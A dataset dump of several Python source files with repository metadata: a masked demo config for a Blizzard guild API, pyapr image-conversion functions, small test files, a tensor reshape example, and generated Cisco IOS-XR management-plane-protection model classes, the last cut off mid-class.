| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7deb87270455ef49cd2459acc11beb09e29c215a
| 1,707
|
py
|
Python
|
config.demo.py
|
DiegoLing33/prestij.xyz-api
|
69a11a2c93dd98975f9becbc4b8f596e4941a05f
|
[
"MIT"
] | null | null | null |
config.demo.py
|
DiegoLing33/prestij.xyz-api
|
69a11a2c93dd98975f9becbc4b8f596e4941a05f
|
[
"MIT"
] | null | null | null |
config.demo.py
|
DiegoLing33/prestij.xyz-api
|
69a11a2c93dd98975f9becbc4b8f596e4941a05f
|
[
"MIT"
] | null | null | null |
# ██╗░░░░░██╗███╗░░██╗░██████╗░░░░██████╗░██╗░░░░░░█████╗░░█████╗░██╗░░██╗
# ██║░░░░░██║████╗░██║██╔════╝░░░░██╔══██╗██║░░░░░██╔══██╗██╔══██╗██║░██╔╝
# ██║░░░░░██║██╔██╗██║██║░░██╗░░░░██████╦╝██║░░░░░███████║██║░░╚═╝█████═╝░
# ██║░░░░░██║██║╚████║██║░░╚██╗░░░██╔══██╗██║░░░░░██╔══██║██║░░██╗██╔═██╗░
# ███████╗██║██║░╚███║╚██████╔╝░░░██████╦╝███████╗██║░░██║╚█████╔╝██║░╚██╗
# ╚══════╝╚═╝╚═╝░░╚══╝░╚═════╝░░░░╚═════╝░╚══════╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝
#
# Developed by Yakov V. Panov (C) Ling • Black 2020
# @site http://ling.black
# Guild name, e.g. "Престиж"
guild_name = "#########"
# Server slug, e.g. "gordunni"
server_slug = "########"
mythic_season = 4
default_namespace = "profile-eu"
default_static_namespace = "static-eu"
# Client api
client_id = "################"
client_secret = "################"
# Blizzard
blizzard_api_url = "https://eu.api.blizzard.com"
# Static data
default_static_path = 'static'
default_items_images_path = default_static_path + "/items"
default_characters_images_path = default_static_path + "/characters"
default_files_path = default_static_path + "/files"
# Application
app_server = '127.0.0.1'
app_port = 8000
| 34.836735
| 75
| 0.318102
| 120
| 1,707
| 11.508333
| 0.458333
| 0.047067
| 0.04924
| 0.045619
| 0.74294
| 0.703838
| 0.703838
| 0.703838
| 0.703838
| 0.703838
| 0
| 0.012203
| 0.087873
| 1,707
| 48
| 76
| 35.5625
| 0.318561
| 0.667838
| 0
| 0
| 0
| 0
| 0.245841
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81becf0f8669a1954b155b671c2eec2206947dff
| 5,334
|
py
|
Python
|
pyapr/converter/converter_methods.py
|
mosaic-group/PyLibAPR
|
4b5af50c26b4770c460460f9491bd840af2537da
|
[
"Apache-2.0"
] | 7
|
2021-07-02T11:08:30.000Z
|
2022-03-07T20:54:33.000Z
|
pyapr/converter/converter_methods.py
|
mosaic-group/PyLibAPR
|
4b5af50c26b4770c460460f9491bd840af2537da
|
[
"Apache-2.0"
] | 19
|
2020-12-17T09:32:09.000Z
|
2022-01-08T20:22:16.000Z
|
pyapr/converter/converter_methods.py
|
mosaic-group/PyLibAPR
|
4b5af50c26b4770c460460f9491bd840af2537da
|
[
"Apache-2.0"
] | 1
|
2021-01-19T14:23:36.000Z
|
2021-01-19T14:23:36.000Z
|
import pyapr
import numpy as np
def get_apr(image, rel_error=0.1, gradient_smoothing=2, verbose=True, params=None):
# check that the image array is c-contiguous
if not image.flags['C_CONTIGUOUS']:
print('WARNING: \'image\' argument given to get_apr is not C-contiguous \n'
'input image has been replaced with a C-contiguous copy of itself')
image = np.ascontiguousarray(image)
# Initialize objects
apr = pyapr.APR()
if params is None:
par = pyapr.APRParameters()
par.auto_parameters = True
par.rel_error = rel_error
par.gradient_smoothing = gradient_smoothing
else:
par = params
if image.dtype == np.float32:
parts = pyapr.FloatParticles()
converter = pyapr.converter.FloatConverter()
elif image.dtype == np.uint16:
parts = pyapr.ShortParticles()
converter = pyapr.converter.ShortConverter()
# elif image.dtype in {'byte', 'uint8'}: # currently not working
# parts = pyapr.ByteParticles()
# converter = pyapr.converter.ByteConverter()
else:
errstr = 'pyapr.converter.get_apr: input image dtype must be numpy.uint16 or numpy.float32, ' \
'but {} was given'.format(image.dtype)
raise TypeError(errstr)
converter.set_parameters(par)
converter.set_verbose(verbose)
# Compute the APR and sample particles
converter.get_apr(apr, image)
parts.sample_image(apr, image)
return apr, parts
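# Example call (illustrative; `img` is assumed to be a numpy array of
# dtype numpy.uint16 or numpy.float32):
#
#     apr, parts = get_apr(img, rel_error=0.1, gradient_smoothing=2)
#
# returning the APR structure and the particle values sampled from `img`.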
def get_apr_interactive(image, rel_error=0.1, gradient_smoothing=2, verbose=True, params=None, slider_decimals=1):
# check that the image array is c-contiguous
if not image.flags['C_CONTIGUOUS']:
print('WARNING: \'image\' argument given to get_apr_interactive is not C-contiguous \n'
'input image has been replaced with a C-contiguous copy of itself')
image = np.ascontiguousarray(image)
while image.ndim < 3:
image = np.expand_dims(image, axis=0)
# Initialize objects
io_int = pyapr.InteractiveIO()
apr = pyapr.APR()
if params is None:
par = pyapr.APRParameters()
par.auto_parameters = False
par.rel_error = rel_error
par.gradient_smoothing = gradient_smoothing
else:
par = params
if image.dtype == np.float32:
parts = pyapr.FloatParticles()
converter = pyapr.converter.FloatConverter()
elif image.dtype == np.uint16:
parts = pyapr.ShortParticles()
converter = pyapr.converter.ShortConverter()
# elif image.dtype in {'byte', 'uint8'}: # currently not working
# parts = pyapr.ByteParticles()
# converter = pyapr.converter.ByteConverter()
else:
errstr = 'pyapr.converter.get_apr_interactive: input image dtype must be numpy.uint16 or numpy.float32, ' \
'but {} was given'.format(image.dtype)
raise TypeError(errstr)
converter.set_parameters(par)
converter.set_verbose(verbose)
# launch interactive APR converter
io_int.interactive_apr(converter, apr, image, slider_decimals=slider_decimals)
if verbose:
print("Total number of particles: {}".format(apr.total_number_particles()))
print("Number of pixels in original image: {}".format(image.size))
cr = image.size/apr.total_number_particles()
print("Compuational Ratio: {:7.2f}".format(cr))
# sample particles
parts.sample_image(apr, image)
return apr, parts
def find_parameters_interactive(image, rel_error=0.1, gradient_smoothing=0, verbose=True, params=None, slider_decimals=1):
# check that the image array is c-contiguous
if not image.flags['C_CONTIGUOUS']:
print('WARNING: \'image\' argument given to find_parameters_interactive is not C-contiguous \n'
'input image has been replaced with a C-contiguous copy of itself')
image = np.ascontiguousarray(image)
while image.ndim < 3:
image = np.expand_dims(image, axis=0)
# Initialize objects
io_int = pyapr.filegui.InteractiveIO()
apr = pyapr.APR()
if params is None:
par = pyapr.APRParameters()
par.auto_parameters = False
par.rel_error = rel_error
par.gradient_smoothing = gradient_smoothing
else:
par = params
if image.dtype == np.float32:
converter = pyapr.converter.FloatConverter()
elif image.dtype == np.uint16:
converter = pyapr.converter.ShortConverter()
# elif image.dtype in {'byte', 'uint8'}: # currently not working
# converter = pyapr.converter.ByteConverter()
else:
errstr = 'pyapr.converter.find_parameters_interactive: input image dtype must be numpy.uint16 or numpy.float32, ' \
'but {} was given'.format(image.dtype)
raise TypeError(errstr)
converter.set_parameters(par)
converter.set_verbose(verbose)
# launch interactive APR converter
par = io_int.find_parameters_interactive(converter, apr, image, slider_decimals=slider_decimals)
if verbose:
print("---------------------------------")
print("Using the following parameters:")
print("grad_th = {}, sigma_th = {}, Ip_th = {}".format(par.grad_th, par.sigma_th, par.Ip_th))
print("---------------------------------")
return par
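if __name__ == '__main__':
    # Minimal usage sketch (assumed inputs, not part of the library API):
    # convert a small random uint16 volume to an APR and report the
    # computational ratio.
    img = (np.random.rand(64, 128, 128) * 1000).astype(np.uint16)
    apr, parts = get_apr(img, rel_error=0.1, gradient_smoothing=2,
                         verbose=False)
    print("Computational Ratio: {:7.2f}".format(
        img.size / apr.total_number_particles()))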
| 35.798658
| 123
| 0.655231
| 645
| 5,334
| 5.305426
| 0.181395
| 0.043834
| 0.060491
| 0.012274
| 0.870251
| 0.853887
| 0.853887
| 0.853887
| 0.820573
| 0.779369
| 0
| 0.010755
| 0.233033
| 5,334
| 148
| 124
| 36.040541
| 0.825715
| 0.132358
| 0
| 0.757576
| 0
| 0
| 0.215588
| 0.04277
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.020202
| 0
| 0.080808
| 0.10101
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81d2b88773f7ac335ce891860ac99cb204b289f7
| 1,070
|
py
|
Python
|
tests/etl/workflow/regimen_to_treatment/expected_outputs.py
|
PDCMFinder/pdcm-etl
|
df0006e4ad5ca2ddf9c1387e28a0b7fb24f195de
|
[
"Apache-2.0"
] | 1
|
2022-01-28T16:01:59.000Z
|
2022-01-28T16:01:59.000Z
|
tests/etl/workflow/regimen_to_treatment/expected_outputs.py
|
PDCMFinder/pdcm-etl
|
df0006e4ad5ca2ddf9c1387e28a0b7fb24f195de
|
[
"Apache-2.0"
] | 37
|
2022-02-09T18:19:13.000Z
|
2022-03-29T12:14:19.000Z
|
tests/etl/workflow/regimen_to_treatment/expected_outputs.py
|
PDCMFinder/pdcm-etl
|
df0006e4ad5ca2ddf9c1387e28a0b7fb24f195de
|
[
"Apache-2.0"
] | null | null | null |
expected_regimen_to_treatment = [
{
"id": "1",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "1"
},
{
"id": "2",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "2"
},
{
"id": "3",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "3"
},
{
"id": "4",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "4"
},
{
"id": "5",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "5"
},
{
"id": "6",
"regimen_ontology_term_id": "1",
"treatment_ontology_term_id": "6"
},
{
"id": "7",
"regimen_ontology_term_id": "2",
"treatment_ontology_term_id": "7"
},
{
"id": "8",
"regimen_ontology_term_id": "2",
"treatment_ontology_term_id": "1"
},
{
"id": "9",
"regimen_ontology_term_id": "2",
"treatment_ontology_term_id": "8"
}
]
| 22.291667
| 41
| 0.48972
| 112
| 1,070
| 4.169643
| 0.142857
| 0.462527
| 0.539615
| 0.404711
| 0.880086
| 0.880086
| 0.867238
| 0.867238
| 0.867238
| 0
| 0
| 0.038244
| 0.340187
| 1,070
| 47
| 42
| 22.765957
| 0.623229
| 0
| 0
| 0.234043
| 0
| 0
| 0.462617
| 0.420561
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c4b6fe0bb543bd533c5e2067f3bf734ba2815250
| 876
|
py
|
Python
|
tests/test_ret_types.py
|
Cologler/bytecode2ast-python
|
407b261a493e018bc86388040ddfb6fb0e4b96d9
|
[
"MIT"
] | null | null | null |
tests/test_ret_types.py
|
Cologler/bytecode2ast-python
|
407b261a493e018bc86388040ddfb6fb0e4b96d9
|
[
"MIT"
] | null | null | null |
tests/test_ret_types.py
|
Cologler/bytecode2ast-python
|
407b261a493e018bc86388040ddfb6fb0e4b96d9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2019~2999 - Cologler <skyoflw@gmail.com>
# ----------
#
# ----------
from utils import get_instrs_from_b2a, get_instrs
def test_return_none():
def func():
return None
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_true():
def func():
return True
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_false():
def func():
return False
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_int():
def func():
return 10
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_str():
def func():
return '10'
assert get_instrs(func) == get_instrs_from_b2a(func)
def test_return_bytes():
def func():
return b'10'
assert get_instrs(func) == get_instrs_from_b2a(func)
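# The helpers above live in tests/utils.py (not shown here). A
# hypothetical get_instrs in the same spirit could be built on the dis
# module:
#
#     import dis
#
#     def get_instrs(func):
#         return [(i.opname, i.argval) for i in dis.get_instructions(func)]
#
# while get_instrs_from_b2a would round-trip func through bytecode2ast
# (bytecode -> AST -> recompile) first, so each assert checks that the
# round trip preserves the instruction stream.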
| 19.466667
| 56
| 0.644977
| 123
| 876
| 4.268293
| 0.243902
| 0.24
| 0.173333
| 0.213333
| 0.630476
| 0.630476
| 0.630476
| 0.630476
| 0.630476
| 0.630476
| 0
| 0.032164
| 0.219178
| 876
| 44
| 57
| 19.909091
| 0.73538
| 0.111872
| 0
| 0.48
| 0
| 0
| 0.005188
| 0
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.48
| true
| 0
| 0.04
| 0.24
| 0.76
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c4be772540ff6830b9282271962bf59995e2a59d
| 436
|
py
|
Python
|
examples/python/cpu/tensors/tensor_reshape_01.py
|
kant/ocean-tensor-package
|
fb3fcff8bba7f4ef6cd8b8d02f0e1be1258da02d
|
[
"Apache-2.0"
] | 27
|
2018-08-16T21:32:49.000Z
|
2021-11-30T10:31:08.000Z
|
examples/python/cpu/tensors/tensor_reshape_01.py
|
kant/ocean-tensor-package
|
fb3fcff8bba7f4ef6cd8b8d02f0e1be1258da02d
|
[
"Apache-2.0"
] | null | null | null |
examples/python/cpu/tensors/tensor_reshape_01.py
|
kant/ocean-tensor-package
|
fb3fcff8bba7f4ef6cd8b8d02f0e1be1258da02d
|
[
"Apache-2.0"
] | 13
|
2018-08-17T17:33:16.000Z
|
2021-11-30T10:31:09.000Z
|
import pyOcean_cpu as ocean
# Fortran-style strides
a = ocean.tensor([3,4],'F')
a.copy(range(a.nelem))
print(a)
print(a.strides)
b = a.reshape([2,3,2])
print(b)
print(b.storage.obj == a.storage.obj)
a.reshape([2,6],True)
print(a)
# C-style strides
a = ocean.tensor([3,4],'C')
a.copy(range(a.nelem))
print(a)
print(a.strides)
b = a.reshape([2,3,2])
print(b)
print(b.storage.obj == a.storage.obj)
a.reshape([2,6],True)
print(a)
| 14.533333
| 37
| 0.655963
| 87
| 436
| 3.275862
| 0.287356
| 0.126316
| 0.126316
| 0.126316
| 0.884211
| 0.884211
| 0.884211
| 0.701754
| 0.701754
| 0.701754
| 0
| 0.036082
| 0.110092
| 436
| 29
| 38
| 15.034483
| 0.698454
| 0.084862
| 0
| 0.842105
| 0
| 0
| 0.005063
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0.526316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
c4c3e62adf0aa32d271b739ebd85610d1721338c
| 28,122
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_lib_mpp_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_lib_mpp_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_lib_mpp_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" Cisco_IOS_XR_lib_mpp_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR lib\-mpp package operational data.
This module contains definitions
for the following management objects\:
management\-plane\-protection\: Management Plane Protection (MPP)
operational data
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class MppAllowEnum(Enum):
"""
MppAllowEnum
MPP protocol types
.. data:: ssh = 0
SSH protocol
.. data:: telnet = 1
TELNET protocol
.. data:: snmp = 2
SNMP protocol
.. data:: tftp = 3
TFTP protocol
.. data:: http = 4
HTTP protocol
.. data:: xr_xml = 5
XML
.. data:: netconf = 6
NETCONF protocol
.. data:: all = 7
All
"""
ssh = 0
telnet = 1
snmp = 2
tftp = 3
http = 4
xr_xml = 5
netconf = 6
all = 7
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['MppAllowEnum']
class MppAfIdBaseIdentity(object):
"""
Base identity for Mpp\-af\-id
"""
_prefix = 'Cisco-IOS-XR-lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
pass
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['MppAfIdBaseIdentity']['meta_info']
class ManagementPlaneProtection(object):
"""
Management Plane Protection (MPP) operational
data
.. attribute:: inband
Management Plane Protection (MPP) inband interface data
**type**\: :py:class:`Inband <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband>`
.. attribute:: outband
Management Plane Protection (MPP) outband interface data
**type**\: :py:class:`Outband <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.inband = ManagementPlaneProtection.Inband()
self.inband.parent = self
self.outband = ManagementPlaneProtection.Outband()
self.outband.parent = self
class Outband(object):
"""
Management Plane Protection (MPP) outband
interface data
.. attribute:: interfaces
List of inband/outband interfaces
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Interfaces>`
.. attribute:: vrf
Outband VRF information
**type**\: :py:class:`Vrf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Vrf>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interfaces = ManagementPlaneProtection.Outband.Interfaces()
self.interfaces.parent = self
self.vrf = ManagementPlaneProtection.Outband.Vrf()
self.vrf.parent = self
class Vrf(object):
"""
Outband VRF information
.. attribute:: vrf_name
Outband VRF name
**type**\: str
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.vrf_name = None
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:outband/Cisco-IOS-XR-lib-mpp-oper:vrf'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Vrf']['meta_info']
class Interfaces(object):
"""
List of inband/outband interfaces
.. attribute:: interface
MPP interface information
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Interfaces.Interface>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interface = YList()
self.interface.parent = self
self.interface.name = 'interface'
class Interface(object):
"""
MPP interface information
.. attribute:: interface_name <key>
Interface name, specify 'all' for all interfaces
**type**\: str
.. attribute:: protocol
MPP Interface protocols
**type**\: list of :py:class:`Protocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Interfaces.Interface.Protocol>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interface_name = None
self.protocol = YList()
self.protocol.parent = self
self.protocol.name = 'protocol'
class Protocol(object):
"""
MPP Interface protocols
.. attribute:: allow
MPP allow
**type**\: :py:class:`MppAllowEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.MppAllowEnum>`
.. attribute:: is_all_peers_allowed
If TRUE, all peers are allowed
**type**\: bool
.. attribute:: peer_address
List of peer addresses
**type**\: list of :py:class:`PeerAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Outband.Interfaces.Interface.Protocol.PeerAddress>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.allow = None
self.is_all_peers_allowed = None
self.peer_address = YList()
self.peer_address.parent = self
self.peer_address.name = 'peer_address'
class PeerAddress(object):
"""
List of peer addresses
.. attribute:: af_name
AFName
**type**\: :py:class:`MppAfIdBaseIdentity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.MppAfIdBaseIdentity>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.af_name = None
self.ipv4_address = None
self.ipv6_address = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-lib-mpp-oper:peer-address'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.af_name is not None:
return True
if self.ipv4_address is not None:
return True
if self.ipv6_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Interfaces.Interface.Protocol.PeerAddress']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-lib-mpp-oper:protocol'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.allow is not None:
return True
if self.is_all_peers_allowed is not None:
return True
if self.peer_address is not None:
for child_ref in self.peer_address:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Interfaces.Interface.Protocol']['meta_info']
@property
def _common_path(self):
if self.interface_name is None:
raise YPYModelError('Key property interface_name is None')
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:outband/Cisco-IOS-XR-lib-mpp-oper:interfaces/Cisco-IOS-XR-lib-mpp-oper:interface[Cisco-IOS-XR-lib-mpp-oper:interface-name = ' + str(self.interface_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interface_name is not None:
return True
if self.protocol is not None:
for child_ref in self.protocol:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Interfaces.Interface']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:outband/Cisco-IOS-XR-lib-mpp-oper:interfaces'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interface is not None:
for child_ref in self.interface:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband.Interfaces']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:outband'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interfaces is not None and self.interfaces._has_data():
return True
if self.vrf is not None and self.vrf._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Outband']['meta_info']
class Inband(object):
"""
Management Plane Protection (MPP) inband
interface data
.. attribute:: interfaces
List of inband/outband interfaces
**type**\: :py:class:`Interfaces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband.Interfaces>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interfaces = ManagementPlaneProtection.Inband.Interfaces()
self.interfaces.parent = self
class Interfaces(object):
"""
List of inband/outband interfaces
.. attribute:: interface
MPP interface information
**type**\: list of :py:class:`Interface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband.Interfaces.Interface>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interface = YList()
self.interface.parent = self
self.interface.name = 'interface'
class Interface(object):
"""
MPP interface information
.. attribute:: interface_name <key>
Interface name, specify 'all' for all interfaces
**type**\: str
.. attribute:: protocol
MPP Interface protocols
**type**\: list of :py:class:`Protocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband.Interfaces.Interface.Protocol>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.interface_name = None
self.protocol = YList()
self.protocol.parent = self
self.protocol.name = 'protocol'
class Protocol(object):
"""
MPP Interface protocols
.. attribute:: allow
MPP allow
**type**\: :py:class:`MppAllowEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.MppAllowEnum>`
.. attribute:: is_all_peers_allowed
If TRUE, all peers are allowed
**type**\: bool
.. attribute:: peer_address
List of peer addresses
**type**\: list of :py:class:`PeerAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.ManagementPlaneProtection.Inband.Interfaces.Interface.Protocol.PeerAddress>`
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.allow = None
self.is_all_peers_allowed = None
self.peer_address = YList()
self.peer_address.parent = self
self.peer_address.name = 'peer_address'
class PeerAddress(object):
"""
List of peer addresses
.. attribute:: af_name
AFName
**type**\: :py:class:`MppAfIdBaseIdentity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_lib_mpp_oper.MppAfIdBaseIdentity>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
self.parent = None
self.af_name = None
self.ipv4_address = None
self.ipv6_address = None
